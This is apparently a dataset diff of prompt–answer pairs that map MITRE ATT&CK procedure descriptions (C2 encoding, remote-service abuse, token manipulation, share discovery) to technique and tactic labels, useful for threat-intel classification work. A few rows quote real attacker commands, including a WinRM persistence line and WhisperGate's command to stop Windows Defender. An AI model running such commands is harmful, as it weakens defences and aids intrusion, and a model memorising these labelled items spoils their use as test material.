+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp encodes C&C communication using Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has encoded its communications to C2 servers using Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has used Base64 to encode its C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Torisma has encoded C2 communications with Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can Base64-encode C2 commands.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has returned C2 data as encoded ASCII.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WARPWIRE can Base64 encode captured credentials with `btoa()` prior to sending to C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIREFIRE can Base64 encode process output sent to C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess has used Base64 encoding to uniquely identify communication to and from the C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to base64 encode C2 communications.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has used Zlib to compress C2 communications data before encrypting it.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT uses Base64 encoding for C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has used Base64 to encode its C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Newer variants of BACKSPACE will encode C2 communications with a custom system.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot encodes commands from the control server using a range of characters and gzip.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub has used a non-standard encoding in DNS tunneling removing any `=` from the result of base64 encoding, and replacing `/` characters with `-s` and `+` characters with `-p`.","Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can encode C2 communications with a base64 algorithm using a custom alphabet.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OceanSalt can encode data with a NOT operation before sending the data to the control server.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowGoop can use a modified Base64 encoding mechanism to send data to and from the C2 server.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can communicate with the C2 via subdomains that utilize base64 with character substitutions.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has encoded data as readable Latin characters.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use a custom base62 and a de-facto base32 encoding that uses digits 0-9 and lowercase letters a-z in C2 communications.,"Tecnique: T1132.002 Data Encoding: Non-Standard Encoding, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team installed a modified Dropbear SSH client as the backdoor to target systems.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used Citrix and VPNs to persist in compromised environments.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used VPN access to persist in the victim environment.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo ""C:\Windows\System32\winrm.vbs"" set winrm/config/service@{EnableCompatibilityHttpsListener=""true""}`.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used stolen credentials to connect to the victim's network via VPN.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For the SolarWinds Compromise, APT29 used compromised identities to access networks via SSH, VPNs, and other remote access tools.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 actors leverage legitimate credentials to log into external remote services.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used compromised identities to access networks via VPNs and Citrix.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira uses compromised VPN accounts for initial access to victim networks.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has gained access to compromised environments via remote access services such as the corporate virtual private network (VPN).,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 has used legitimate VPN, Citrix, or VNC credentials to maintain access to a victim environment.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used RDP to establish persistence.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment.","Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has leveraged legitimate remote management tools to maintain persistent access.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments. TeamTNT has also targeted exposed kubelets for Kubernetes environments.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki was executed through an open Docker daemon API port.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard was executed through an unsecure kubelet that allowed anonymous access to the victim environment.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing was executed in an Ubuntu container deployed via an open Docker daemon API.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linux Rabbit attempts to gain access to the server via SSH.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can establish an SSH connection from a compromised host to a server.,"Tecnique: T1133 External Remote Services, Tactic: TA0001 Initial Access TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation.","Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used JuicyPotato to abuse the SeImpersonate token privilege to escalate from web application pool accounts to NT Authority\SYSTEM.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used has used Metasploit’s named-pipe impersonation technique to escalate privileges.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can gain system level privilege by passing SeDebugPrivilege to the AdjustTokenPrivilege API.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat has the ability modify access tokens.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has used SeDebugPrivilege and AdjustTokenPrivileges to elevate privileges.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.","Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use PowerSploit's Invoke-TokenManipulation to manipulate access tokens.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use token manipulation to bypass UAC on Windows7 systems.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`.","Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can adjust token privileges.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk has attempted to get the access token of a process by calling OpenProcessToken. If KillDisk gets the access token, then it attempt to modify the token privileges with AdjustTokenPrivileges.","Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can use `AdjustTokenPrivileges()` to elevate privileges.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex can enable SeDebugPrivilege and adjust token privileges.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can use Invoke-TokenManipulation for manipulating tokens.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Invoke-TokenManipulation Exfiltration module can be used to manipulate tokens.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has attempted to adjust its token privileges to have the SeDebugPrivilege.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT modified its security token to grants itself debugging privileges by adding SeDebugPrivilege.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver has the ability to manipulate user tokens on targeted Windows systems.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SslMM contains a feature to manipulate process privileges and tokens.,"Tecnique: T1134 Access Token Manipulation, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used a malicious framework designed to impersonate the lsass.exe/vmtoolsd.exe token.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to duplicate a token from ntprint.exe.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can impersonate a `lsass.exe` or `vmtoolsd.exe` token.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can use the tokens of users to create processes on infected systems.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can steal access tokens from exiting processes.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has the ability to duplicate the user’s token.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher uses token manipulation with NtFilterToken as part of UAC bypass.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can find a process owned by a specific user and impersonate the associated token.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon can impersonate tokens using LogonUser, ImpersonateLoggedOnUser, and ImpersonateNamedPipeClient.","Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape impersonates the main thread of CExecSvc.exe by calling NtImpersonateThread.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tarrask leverages token theft to obtain `lsass.exe` security permissions.,"Tecnique: T1134.001 Access Token Manipulation: Token Impersonation/Theft, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla RPC backdoors can impersonate or steal process tokens before executing commands.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to execute a process using runas.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use Invoke-RunAs to make tokens.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can attempt to gain administrative privileges using token impersonation.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can use Invoke-RunAs to make tokens.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can launch an instance of itself with administrative rights using runas.,"Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The WhisperGate third stage can use the AdvancedRun.exe tool to execute commands in the context of the Windows TrustedInstaller group via `%TEMP%\AdvancedRun.exe"" /EXEFilename ""C:\Windows\System32\sc.exe"" /WindowState 0 /CommandLine ""stop WinDefend"" /StartDirectory """" /RunAs 8 /Run`.","Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a command called RunAs, which creates a new process as another user or process context.","Tecnique: T1134.002 Access Token Manipulation: Create Process with Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized tools such as Incognito V2 for token manipulation and impersonation.,"Tecnique: T1134.003 Access Token Manipulation: Make and Impersonate Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can make tokens from known credentials.,"Tecnique: T1134.003 Access Token Manipulation: Make and Impersonate Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can create a token for a different user.,"Tecnique: T1134.003 Access Token Manipulation: Make and Impersonate Token, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can spawn processes with alternate PPIDs.,"Tecnique: T1134.004 Access Token Manipulation: Parent PID Spoofing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate relies on parent PID spoofing as part of its ""rootkit-like"" functionality to evade detection via Task Manager or Process Explorer.","Tecnique: T1134.004 Access Token Manipulation: Parent PID Spoofing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.,"Tecnique: T1134.004 Access Token Manipulation: Parent PID Spoofing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can use parent PID spoofing to elevate privileges.,"Tecnique: T1134.004 Access Token Manipulation: Parent PID Spoofing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can add a SID-History to a user if on a domain controller.,"Tecnique: T1134.005 Access Token Manipulation: SID-History Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz's MISC::AddSid module can append any SID or user/group account to a user's SID-History. Mimikatz also utilizes SID-History Injection to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.,"Tecnique: T1134.005 Access Token Manipulation: SID-History Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.","Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `net share` command as part of their advanced reconnaissance.","Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors discovered network disks mounted to the system using netstat.","Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 listed connected network shares.,"Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used the net view command to show all shares available, including the administrative shares such as C$ and ADMIN$.","Tecnique: T1135 Network Share Discovery, Tactic: TA0007 Discovery"
